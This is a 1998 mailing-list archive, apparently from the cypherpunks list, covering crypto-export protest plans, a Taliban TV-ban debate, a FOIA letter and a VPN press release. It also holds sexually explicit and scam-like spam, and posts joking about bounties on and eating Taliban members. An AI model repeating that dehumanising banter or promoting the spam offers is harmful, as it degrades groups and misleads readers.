Message-ID: <1.5.4.32.19980709054803.0073c9b8@mail.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear Pauline Hanson's One Nation supporter in NSW

We are pleased to be able to advise that the problems faced following the
financial collapse of our Internet Service Provider (ISP), Pronet, have now
been resolved.

During the last week we have:
=============================

- re-directed the "gwb" and "onenation" domain's to our new ISP.
- established 170 mBytes of data including several hundred images and
hundreds of related One Nation web pages and thousands of links on the new host.
- begun the process of establishing a moderated discussion board at our new
ISP (under our direct control).

It is important to realise that the DNS re-delegation of the "gwb" and
"onenation" domain names will "filter through" over the next 48 hours. In
the meantime establishing a link with:

onenation.com.au 
or 
gwb.com.au/onenation

might be a temporary problem until your DNS look-up is updated on your ISP.

If you come across links that do not work on our new ISP please contact GWB
with the URL that you tried to access the link from and the link "caption"
(eg 'take this link to see...'). Your assistance in this regard would be
greatly appreciated.

By Sunday, 12th July, you should be able to access the full One Nation web
site and Australian News of the Day web sites USING YOUR OLD BOOKMARKS.

Please Note: A summary of news on this week's Australian National News of
the Day (anotd) will be available on fax back number: 1902 211037 from
tomorrow (Friday) afternoon. Last week's summary of the anotd is currently
available at that number for Australian based recipients of this email.

The cost is 75 cents per minute. 

Email:
======
The email currently address being used (vjb@gil.com.au) has been on a
temporary basis and will no longer be used by the writer after the end of July.

The "gwb@gwb.com.au" email address will be active when you are able to
access the One Nation web sites through your old bookmarks.

Once again we apologise for this break in providing you Pauline Hanson's One
Nation on-line and thank you for your patience and support.

GWB



Scott Balson
Pauline Hanson's Web Master





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Thu, 9 Jul 1998 13:34:22 -0700 (PDT)
To: Xcott Craver <ravage@EINSTEIN.ssz.com>
Subject: Re: "Classified" Ads  (Was Re: RSA in perl illegal to export)
In-Reply-To: <199807090001.RAA20366@puuoo.eng.sun.com>
Message-ID: <3.0.3.32.19980709163207.03355c8c@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:47 AM 7/9/98 -0500, Xcott Craver wrote:
>	We start a mailing list or website (a website would be better)
>	of volunteers and the newspapers they intend to place ads in.
>	Major papers would hopefully get multiple copies of the ad in
>	multiple sections.  All on the same day.

If there is any real interest in doing this as a group, I'll be happy to
setup a web site and a mail list for this.

Does newsprint from most major US papers still qualify as  "A small group
of internet users manufacturing and distributing tons of high end munitions
for export overseas?"


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Thu, 9 Jul 1998 14:31:00 -0700 (PDT)
To: attila <attila@hun.org>
Subject: Re: FC: Forget Internet restrictions -- how about banning TV?
In-Reply-To: <Pine.BSF.3.96.980709192532.4532A-100000@hun.org>
Message-ID: <Pine.LNX.3.96.980709170552.22376A-100000@ismene>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Jul 1998, attila wrote:

> On Thu, 9 Jul 1998, Declan McCullagh forwarded from TIME:
> 
> >...
> >   The revolution will not be televised -- at least not in Afghanistan.
> >   The Taliban government today banned TV, and gave Afghans 15 days to
> >   get rid of all sets and VCRs. After that, if the organization's
> >   enforcers find one in your house, it will be destroyed and you will be
> >   punished.
> >...
> 
>     sounds good to me; I've raised 5 children who know how to _read_.
> 
>     I've never owned a television, never saw the need to bring cancer
>     into the home. TV could have been one of the greatest educational
>     tools in the existence of mankind --and, what is it? nothing more
>     than bread and circus for the mass, a tool for social reoganization 
>     and the destruction of the family.

I suspect one day someone will be saying something similar about the
net.

I have a small TV and cable, which sits a few feet away from my computer.
If I could, I'd just fly around the country going to Mets and Yankees
games.. and of course during the "slow season" I can always go to football
games. 

TV is what you make of it. I suppose if a kid sits in a room by himself
and vegges out in front of it, it does more harm than good.. on the
other hand, when you're 15 years old and can't talk to your dad about
much because its just that time in life, I'd be willing to bet baseball
or sports is still neutral enough territory. I don't see much wrong
with crowding around the idiot box as a family or group, if it gives
people something to talk about. Politics and religion can be fun now and
then, but we all get weary of fighting the same battles. 

Sure, lots of TV is garbage.. but hell.. look around.. a whole lot of
the net is too. 

It isn't TV's fault, and it isn't the net.. the reason why so many things
suck is because we made them. More often than not, we're the garbage.

hmm.. I had hoped this message might be uplifting. Guess not.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
Be a munitions trafficker: http://www.dcs.ex.ac.uk/~aba/rsa/rsa-keygen.html

#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: finances@softhome.net
Date: Thu, 9 Jul 1998 02:28:30 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Make Money From Our National Television Infomercial!
Message-ID: <199807090928.CAA28650@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



There is over 400 BILLION DOLLARS IN UNCLAIMED money in North America.

We want to help return this money to its rightful owners! 

To do this we are launching a NATIONAL INFOMERCIAL ON TELEVISION.
 
We are looking for 300 INDEPENDENT AGENTS who will become a part of 
this infomercial.  NO SELLING IS REQUIRED!!!

Each Agent will own an exclusive territory and will receive a 
percentage of the money generated from the television informercial!  

Your involvement will be very finacially rewarding.  

Find out more about the opportunity and how you can get involved.      

Visit our website at http://205.152.190.238/opp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Jul 1998 15:52:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Bye Homeland Liberty
Message-ID: <199807092252.SAA07453@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Note the single mention of cyber warfare, hooked to chemical 
and biological dangers.


http://www.defenselink.mil/news/

Remarks by Deputy Secretary of Defense John J. Hamre
Commemorating the 200th Anniversary of the Recall of 
George Washington to Active Duty
Mount Vernon, Virginia
Saturday, July 4, 1998

[Snip]

Two hundred years ago, Washington was called back to service 
to prepare America's defenses.  Today, the American homeland 
faces a new and different danger.  The threat is not from overt 
invasion, but from the sinister dangers of chemical, biological 
and cyber warfare.  Chemical and biological weapons are a poor 
man's atomic bomb.  They are easier to build, to hide, and to 
deliver to their targets.  They are especially appealing to 
small terrorist cells and known individuals who can not challenge 
American military superiority on the battlefield.

As in Washington's time, America is not yet fully prepared for this 
new challenge. We too must organize, plan, and act anew. We too 
must recognize that complacency and delay is dangerous. President 
Clinton and Secretary of Defense Cohen have made preparing the 
American homeland against chemical and biological weapons a top 
priority.  The continental United States has not confronted a 
direct threat to its territory in this century precisely because 
we have confronted threats before they touched our shores.  But 
this is a new era, where adversaries can bring their fight to our 
doorstep.  National security now must assume a new dimension.

The Department of Defense and the intelligence community must work 
hand in hand with law enforcement to deal with this far-reaching 
threat.  We are taking steps to improve our knowledge of hostile 
elements and their plans.  We are reorganizing the Defense 
Department to integrate our approach to counter-proliferation of 
these terrible new weapons, and we are launching new programs to 
help local emergency response forces to mitigate the effects of 
chemical and biological attack.

[Snip]

Shortly, we will commemorate this day by planting a new tree, 
adding to Washington's beloved "shades of Mount Vernon."  We place 
it here as a mark of gratitude to a leader who accepted the burdens 
of public service to defend our young republic.  We also place it 
here to mark our commitment to ensure future generations will live 
in peace and security.  One hundred years from now we will not be 
here, but I hope Americans will gather under this tree to celebrate 
the 300th anniversary of Washington's act of patriotic sacrifice.  
And I hope they will also say, of us, that we too left a measure 
of our day and, by our deeds, we too preserved the safety of this 
sweet land of liberty.

Thank you all for coming today.

-END-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Thu, 9 Jul 1998 12:37:00 -0700 (PDT)
To: Declan McCullagh <cypherpunks@toad.com>
Subject: Re: FC: Forget Internet restrictions -- how about banning TV?
In-Reply-To: <Pine.GSO.3.95.980709105729.2638a-100000@well.com>
Message-ID: <Pine.BSF.3.96.980709192532.4532A-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Jul 1998, Declan McCullagh forwarded from TIME:

>...
>   The revolution will not be televised -- at least not in Afghanistan.
>   The Taliban government today banned TV, and gave Afghans 15 days to
>   get rid of all sets and VCRs. After that, if the organization's
>   enforcers find one in your house, it will be destroyed and you will be
>   punished.
>...

    sounds good to me; I've raised 5 children who know how to _read_.

    I've never owned a television, never saw the need to bring cancer
    into the home. TV could have been one of the greatest educational
    tools in the existence of mankind --and, what is it? nothing more
    than bread and circus for the mass, a tool for social reoganization 
    and the destruction of the family.

    babysitter?  momma's little helper? not really; a creator of a
    vast unthinking social wasteland --which, of course, fits the
    policy goals of Hillay's Global Village where everybody is just
    another butterscotch pudding to her recipe.

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Thu, 9 Jul 1998 14:47:28 -0700 (PDT)
To: Eric Murray <ericm@lne.com>
Subject: Re: FC: Forget Internet restrictions -- how about banning TV?
In-Reply-To: <199807092027.NAA02656@slack.lne.com>
Message-ID: <Pine.BSF.3.96.980709213822.4532E-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Jul 1998, Eric Murray wrote:
> [snip]
>
>Then they came for the newspaper, and that really pissed me off, so
>I wanted to protest.  I wanted my protest to get a lot of exposure, so
>I went to call the TV and radio stations but they don't exist any more.
>
    point duly noted.  however, TV as a degenerative (self eating 
    watermelon) force is an option --which I took by refusing it
    the privilege of its one eyed stare. never owned one as the
    fraction of worthwhile programming is overwhelmed by mind-fuck.

>>     policy goals of Hillay's Global Village where everybody is just
>>     another butterscotch pudding to her recipe.
>
>I'd rather be dealing with Hillary than the Talliban.
>
    by all means. Hillary is an unprincipled, amoral automan who
    expects her comforts.  

    the Talliban/Taleban/or_however_whichever_network_spells_it is
    religious fanaticism; no worse than the Catholic Inquisition I
    would expect, but that's not saying much.

    Hillary can be beaten back into her cage...  Taleban fanaticism
    ends only with their death(s).

    There is no safety this side of the grave.  Never was; never will be.

 ________________________________________________________________attila__







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Thu, 9 Jul 1998 14:53:07 -0700 (PDT)
To: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Subject: RE: FC: Forget Internet restrictions -- how about banning TV?
In-Reply-To: <2FBF98FC7852CF11912A00000000000108A78AE3@DINO>
Message-ID: <Pine.BSF.3.96.980709214845.4532F-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Jul 1998, Harvey Rook (Exchange) wrote:

>So attila, Afghanistan will be a better place because they've banned
>television?
>
>I think you miss the point.
>
>Harv.
>
    I didnt miss the point, Harv...   

    at least I am free to choose whether or not I grant the one-eyed
    beast an audience, the Taleban have precluded that choice. 

    TV _had_ enormous potential; it has been squandered. ergo, I chose.

__________________________________________________________________________
    To be a ruler of men, you need at least 12 inches....
_________________________________________________________________ attila__







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 9 Jul 1998 20:22:07 -0700 (PDT)
To: attila <attila@hun.org>
Subject: Re: FC: Forget Internet restrictions -- how about banning TV?
In-Reply-To: <Pine.BSF.3.96.980709213822.4532E-100000@hun.org>
Message-ID: <199807100325.WAA005.93@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.BSF.3.96.980709213822.4532E-100000@hun.org>, on 07/09/98 
   at 09:47 PM, attila <attila@hun.org> said:

>Hillary can be beaten back into her cage...  Taleban fanaticism
>    ends only with their death(s).

Yes, but more importantly: Is there a bag limit?

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Windows with bullet-proof glass.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNaWJx49Co1n+aLhhAQFqhQP/QudW4N6LjfI1gbIdQ852BG17R8xhhe3f
mLpBzL3jmTndNbp80Gve4MOLi5Nu73j1G/FANPK5qPmmG0CIs03emgV0gpe0ow3s
wrel8TcUV4ugFc5SjQd9qEpZt+4DOrYnhk7oHEQFZJeW/QSfpRRSdYGMWN51dMlf
66BNE01a9QI=
=k2kr
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry <jerry@weboneinc.net>
Date: Thu, 9 Jul 1998 20:49:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: no subject
Message-ID: <199807092321.XAA23250@steve1.weboneinc.com>
MIME-Version: 1.0
Content-Type: text/plain


------------------------------------------------------------------
 This is a targeted mailing to adult webmasters or persons involved
 in the adult internet entertainment industry. If you have received
 this message by mistake, please delete it and accept our apologies.
 ------------------------------------------------------------------
 
 
 Just wanted to let you know about the highest paying Gay referral program:
 GAY CASH NETWORK
 
 $25 per member, online realtime stats, high signup ratios and more!
 
 For more info please go to:
 http://208.156.131.103/gay/
 
 
 Also if you have straight sites check out X-CASH at:
 http://208.156.131.103/xtv/
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Thu, 9 Jul 1998 18:25:24 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Larry Flynt hustles Congress/Monica Lewinskookies
Message-ID: <19980709233913.21088.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

CLICK FOR STUFFED: Thursday July 9 1998

<img src=http://stuffed.net/98/7/9/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
 News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/9/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 9 Jul 1998 16:19:26 -0700 (PDT)
To: pooh@efga.org
Subject: Re: "Classified" Ads  (Was Re: RSA in perl illegal to export)
In-Reply-To: <3.0.3.32.19980709163207.03355c8c@mail.atl.bellsouth.net>
Message-ID: <199807092311.AAA07749@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Robert writes:
> If there is any real interest in doing this as a group, I'll be happy
> to setup a web site and a mail list for this.

and Jim Choate said similar.

A constructive comment: in my obeservation setting up mailing lists
for mini-projects is a sure way to reduce the number of participants
in the project.

A few years back when we were all cracking RC4, it was done right here
on the cypherpunks list.  There were no new lists created.  I suspect
that the CPU resoureces contributed benefitted orders of magnitude due
to this as people got swept up in the fun of it and joined in.  (I
won't volunteer Perry's list as he tries to keep it focussed and I
suspect a few hundred posts on adverts and PR would result in him
turning up the squelch).  So I suggest use cypherpunks list (*).
(subscribe to majordomo@cyberpass.net with message: subscribe
cypherpunks, for those on cryptography).

If we had on the other hand started a list, I suspect a few dozen
might have subscribed, and the rest of us would have forgotten about
it, and heard no more feedback on it.

Lets go for it, I'll join in also, but please in the interests of it's
chances of success, keep it to the cypherpunks list.

Some comments on the thread of what would be most effective:

Anyone with a tame PR expert they can quiz about the best way to
maximise publicity:

- what stunt would create most publicity
- who in the press should be contacted
- which computer companies and who to contact with in them to donate
  funds if funds are required (eg advert)

it may be for example that plenty of publicity can be had for free
with a suitable stunt, if media can be interested.

Perhaps (or perhaps not) Peter Junger could be involved, or
referrenced to tie the two togther in the presses mind, and he would
perhaps make a good person for media hacks to interview also.

Adam

(*) Or if someone gets keen perhaps a filtered version of cypherpunks
selecting only posts on this topic might be useful to a few people --
cpunks is high volume.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eva654@hotmail.com
Date: Thu, 9 Jul 1998 21:23:56 -0700 (PDT)
Subject: Now See Amazing World Record Sex!
Message-ID: <QQexjl20777.199807100423@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Attention!
Warning! Adults Only!                    Warning! Adults Only!

If you are under 21 years of age, or not interested in sexually 
explicit material... please hit your keyboard delete button now
and please excuse the intrusion.  Removal instructions appear
at the end of this email.

Available NOW for only $9.95!  Next 10 Days Only!

WORLD RECORD SEX!

Be There!  See It Now On Video!  Unbelievable ...But True!

You Won't Believe Your Eyes!!!  [As Seen on the Howard Stern Show]

"The World's Biggest Gang Bang"

See sexy  Annabel Chong as she sets the world Gang Bang Record
in this fantastic video documentary that chronicles her 24 hour
sexathon with 251 men engaging in sexual intercourse and oral
sex with her!  Don't worry, you won't have to stay up 24 hours
to watch it all.  We've selected only the most exciting and red
hot scenes for you...all in breathtaking living color with plenty of
extreme close-ups!  This video is guaranteed to knock your socks
off and leave you breathless!  You've never seen anything like it!
Annabel takes on five men at a time!  90 minutes! Order Today!
Only $9.95 plus $3 shipping and handling [Total $12.95].


"GANG BANG II"
The Record Breaker!!!  Starring Jasmin St. Claire!

See Beautiful and Voluptious Jasmin St. Claire shatter Annabel's
gang bang record by taking on 300 men in one 24 hour sex session!
You won't believe your eyes at all the hot firey action that you will
see as the new world record is established before your eyes as
Jasmin  takes on five men at a time for sexual intercourse and
oral sex!  Your friends will break down your door to see this video!
You'll be the most popular guy in town!  The action is truly unreal 
and you will see the best of it in living life-like color!  Order Today
and see Jasmin break the record!  90 minutes.  Only $9.95 plus
$3 shipping and handling [total $12.95].

Also Available...

The Uncensored Authentic Underground...
Pamela Anderson Lee & Tommy Lee
Sex Video Tape!

Everyone is talking about this exciting video!  See Pam and 
Tommy engaging in sexual intercourse and oral sex in the car,
on the boat and much, much more!  A  real collectors video! 30 minutes.
Only $9.95 plus $3 shipping and Handling [total $12.95]

"Tonya Harding Wedding Night Sex Video"
Now see the beautiful Ice Skating Shame of the Olympics
Tonya Harding engaging in sexual intercourse and oral 
sex on her wedding night with husband Jeff Gillooly!
This "Bad Girl" is Hot!  Don't miss this video! 30 minutes.
Only $9.95 plus $3 shipping and handling [total $12.95]

"Traci...I Love You"  Starring Traci Lords
Now see the most beautiful and popular porn star in her last
adult video before she hit the big time!  It's the blockbuster of
the year...sensual...fiery and exposive!  Traci Lords in her most
erotic and controversial film ever!  Don't Miss It!  90 minutes.
Only $9.95 plus $3 shipping and handling [total $12.95]

EMAIL SPECIAL!

ORDER ANY FOUR VIDEOS AND GET THE FIFTH ONE FREE!!!

Your order will be shipped via First Class Mail. All Shipments in plain unmarked wrapper.
For Priority Mail - Add $5
For Overnight Express - add $15

You can order by Phone, Fax, Mail or Email.

We accept all Major Credit Cards and checks by phone or fax.
Visa - MasterCard - American Express - Discover

10 Day Money Back Guarantee!  We know that you will be pleased with these Videos!

To Email your order - DO NOT HIT REPLY ON YOUR KEYBOARD

Send email to our special email address below:

connie274@juno.com

[Note: If you order by email and do not receive an email acknowledgement within 24 hours, please phone our office at
718-287-3800]

Phone our office 9am to 10 pm [eastern time]

[718] 287-3800 to Order By Phone for FASTEST SERVICE!

 We can accept your credit card or check by phone

Fax Your Order 24 hours per day  to  [718] 462-5920
You can fax your credit card information or your check

Order by mail by sending $12.95 per video,  cash, check, money order or major credit card [Visa, MasterCard, American Express or Discover] to

TCPS, INC.
4718  18th Ave.  Suite 135
Brooklyn, NY 11204

Make Checks & Money Orders Payable to TCPS, Inc.
New York State Residents Please Add 85 cents for Sales Tax per Video!

You must be over 21 years of age to order and give us your date of birth with your order!

The Following Order Form is for Your Convenience!

.............................................................................................................




Please ship me the following video tape[s]!

Qty___________Annabel Chong "World's Biggest Gang Bang"

Qty__________"Gang Bang II" Jasmin St. Claire

Qty___________"Pamela & Tommy Lee Sex Video Tape"

Qty_________   "Tonya Harding Wedding Night Sex Video Tape"

Qty__________"Traci I Love You" Traci Lords

at $9.95 each plus $3.00 for shipping and handling per tape
[$12.95 per video or "SPECIAL $51.80 for ALL FIVE"!

Credit Card #______________________________Exp Date___

I hereby represent that I am over 21 years of age.  
My date of birth is_________________________________

Signature______________________________________________

Ship to:  Name_______________________________________

Address____________________________________________

City________________________State___________Zip________

Area Code and Home Phone  [    ]___________________________

Fax # [     ]______________________________________________

Email Address___________________________________________

To remove your name from our mailing list, send us an email with 
remove in the subject line.  This is a one time offer and you should not hear from us again!

FOREIGN ORDERS -Add $15us if you desire Air Parcel Post Shipment.  We ship all over the world.

By deleting your unwanted E-Mail you waste one keystroke, yet
by throwing away paper mail you waste our planet!  SAVE THE
TREES and support internet E-Mail instead of paper mail!

[C] Copyright TCPS 1998





































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Thu, 9 Jul 1998 21:01:25 -0700 (PDT)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: FC: Forget Internet restrictions -- how about banning TV?
In-Reply-To: <199807100325.WAA005.93@geiger.com>
Message-ID: <Pine.BSF.3.96.980710035702.690A-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Jul 1998, William H. Geiger III wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>In <Pine.BSF.3.96.980709213822.4532E-100000@hun.org>, on 07/09/98 
>   at 09:47 PM, attila <attila@hun.org> said:
>
>>Hillary can be beaten back into her cage...  Taleban fanaticism
>>    ends only with their death(s).
>
>Yes, but more importantly: Is there a bag limit?
>
    bag limit? heavens, no! in fact, the last I heard there was a $5/ear
    bounty.  and someone else told me they, like lawyers, taste "just
    like chicken"   --bok-bok--

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 10 Jul 1998 07:31:34 -0700 (PDT)
To: jy@jya.com
Subject: FOIA, Navajo code talkers, Rule 54(b) and PROGRESS
Message-ID: <35A624DB.328F@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday 7/10/98 7:39 AM

John Young

I am reading http://www.jya.com/nsa-foia-req.htm	

This FOIA stuff appears to be catchy.

Will you do a pro se lawsuit in case NSA does not come across?  

There is some great stuff on the web on on that subject.
http://jya.com/whpfiles.htm

I just found

navahode.htm       Navaho Code Expert Dies                          
June 26, 1998 http://www.jya.com/navahode.htm

NavaJo is spelled different in the southwest.

Carpet intaller George Chavez junior told me yesterday that his father
George senior was a code talker.

I told Chavez I would send him a copy of what you posted.

Chavez told me that Carl Gorman, RC Gorman's father
http://www.iwaynet.net/~sabrina/gorman.html
was also a code talker.

Chavez commented that RC is a 'bit wierd.'

Chavez is an UNMISTAKABLE Navajo native American -  complete with LONG
pony tail.

Native Americans in the southwest frequently have TWO names.  One an
anglo or hispanic
name and one their native American name.  Like Star Road or White Sun
made famous by Taos NM
artist Blumenschein.

I'll have to ask Chavez if he has another name.

   Life is to short to do everything in line.
   I lead multiple lives, that is why I have more adventures.
   
   Adam Fortunate Eagle, New Mexican, Sunday, 21 Aug 94

Morales and I believe we are going to win our lawsuits a result of
technical legal mistakes made both in district court and the two SHOW
CAUSE orders I mailed to you.  Partial rulings can cause problems.

Rule 54(b) is VERY COMPLEX.

Life is ABOUT back to normal.

First there was PATTY'S floor tile project in about March.

Then the trip to Austin to see our kids and new granddaughter

Then there was THE FLOOD.  Which was CAUSED BY A MICROCONTROLLER
SOFTWARE
DESIGN AND IMPLEMENTATION ERROR - blunder!  And perhaps some DEFICIENT
washing machine hardware design too.

Next was the about month delay caused by getting the Allstate insurance
adjuster to come around to the carpet sellers, our, and the Allstate 
insurance agent way of thinking about how much Allstate should pay.

Next was the several week delay ordering the carpet.

Last Thursday the downstairs carpet got installed.

Thursday, also, I spent in the ER - which stopped the Friday carpet
completion project.

So yesterday the carpet installers finished.  

Looks GREAT!  And both the carpet installers were real nice guys.

And some legal filings while all of the other above was going on.

So the next two orders of business are

	1  finish the digital FX
	2  conclude our legal fights with SETTLEMENT - before things get WORSE.

On your NSA FOIA I suggest that you seek a waiver of fees since the
material you seek 
benefits the public.

I just saw http://www.jya.com/crypto.htm

  DoE: Pay Bill Payne   
  DoJ: Free Jim Bell 
  DoJ: Free Kevin Mitnick 

THANK YOU.  

Best
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Fri, 10 Jul 1998 09:53:00 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 10, 1998
Message-ID: <199807101642.LAA11829@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




<FONT COLOR="#000000"
SIZE=2>=============================================
Welcome to today's edition of the CTIA Daily
News
from WOW-COM.  Please click on the icon /
attachment
for the most important news in wireless
communications today.

WIRELESS IT '98, The Next Generation in
Personal
Computing & Communications October
12-14,
Las Vegas, Nevada Call (202) 785-0081 for more
information!
<FONT COLOR="#000000"
SIZE=2>=============================================

 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lisa" <24893232@03820.com>
Date: Fri, 10 Jul 1998 06:01:37 -0700 (PDT)
To: Only.Me
Subject: For Your Eyes Only
Message-ID: <007801bda6a2$0673b140$37ab9dcc@ativg.co>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
Hi...

I would like to inform you of a great sex site on the web. it contains everything you will ever dream of.

There is also a Live Sex Show from Amsterdam, with sound and a chat box.

Go check it out

http://members.xoom.com/moonshine_81/index.html

Loads of Free Videos and Free Pictures

Love

Lisa


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pay83@hotmail.com (Lenders Plus Network)
Date: Fri, 10 Jul 1998 15:19:41 -0700 (PDT)
To: pay83@hotmail.com
Subject: Get Cash You need Right Away!!
Message-ID: <1998071094ZAA4803@post.net>
MIME-Version: 1.0
Content-Type: text/plain





                GET THE MONEY YOU NEED RIGHT NOW!

Here's your chance to...

        > Eliminate Credit Card Debt!
       > Take advantage of LOW INTEREST RATES!
        > Escape from High Monthly Payments!
        > Get Relief and Have the Money You Need!
        > Cash in Your Pocket Usually within 7 to 14 days!
        > Make Home Improvements You've Always Wanted!
     > Take the Vacation You Deserve!

How?  Simply CLICK HERE TO VISIT OUR WEBSITE -->
http://www.bighitter.holowww.com/american107.htm

Would you like money for...

           ~ A New Car?
        ~ College Tuition?
          ~ Taxes?
          ~ Consolidate Your Credit Cards?
        ~ A Dream Vacation?
          ~ Home Improvements?

Now It Can Be Yours!   What are you waiting for?

For a FREE evaluation please visit our website by...

               CLICKING HERE (http://www.bighitter.holowww.com/american107.htm


or type or cut & paste: http://www.bighitter.holowww.com/american107.htm

Especially if you're a homeowner, we can help you.  Try us!



n+4 iden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mia Westerholm <Mia.Westerholm@DataFellows.com>
Date: Fri, 10 Jul 1998 07:02:52 -0700 (PDT)
To: F-Secure-Press-Global@DataFellows.com
Subject: Data Fellows Premiers F-Secure VPN+
Message-ID: <3.0.2.32.19980710155153.00a4b7c0@smtp.DataFellows.com>
MIME-Version: 1.0
Content-Type: text/plain


For immediate release
10 July 1998

DATA FELLOWS PREMIERES F-SECURE VPN+
                              
New Software Line Offers IPsec-Based Strong Security for Mission Critical
Networks
        
Helsinki, Finland, July 10, 1998 -- Data Fellows, the global leader in
Internet security solution development, has begun shipping its new F-Secure
VPN+ product family.

Compliant with the IEFT's (Internet Engineering Task Force) latest IPsec
standards (Internet Protocol Security standard), F-Secure VPN+ provides a
peerless software - only solution for both large corporate networks and remote
or small office networking.  The product line supports several different
encryption algorithms, including triple DES (168-bit), DES (56-bit), Blowfish
(40-446 bit), and CAST128 (40-128 bit). All VPN+ products are centrally
administered with an easy-to-use policy management tool and they also
support centrally managed automated installation.

F-Secure VPN+ operates at the network (IP protocol) level, which is invisible
at the application and end-user level.  The product line does not require
special hardware, and the ordinary user does not even notice its presence
since it requires no changes to network applications or their configurations.
F-Secure VPN+ works in conjunction with existing routers and firewalls, off-
loading encryption functions from those devices. By combining the products in
the F-Secure VPN+ line, companies of any size can use either the Internet or
cost-effective public networks to create virtual private networks without
requiring special hardware.
	
The F-Secure VPN+ family consists of the following products: 
   
- F-Secure VPN+ Client,  which operates in Windows and Solaris workstations
and encrypts all data traffic from such a workstation to an F-Secure VPN+
Gateway, a server equipped with F-Secure VPN+ Server, or another
workstation equipped with F-Secure VPN+ Client.  
  
- F-Secure VPN+ Server, which operates in Windows NT or Solaris
servers and encrypts all data traffic from the server to workstations equipped
with F-Secure VPN+ Client.  

- F-Secure VPN+ Gateway, which encrypts all data traffic from a LAN
through a WAN using the IPsec protocol to other LANs, or to workstations
equipped with encryption software.  A user can connect to a VPN+ Gateway
using either another VPN+ Gateway or VPN+ Client.  

- F-Secure VPN+ Enterprise Gateway, which encrypts all data traffic from a
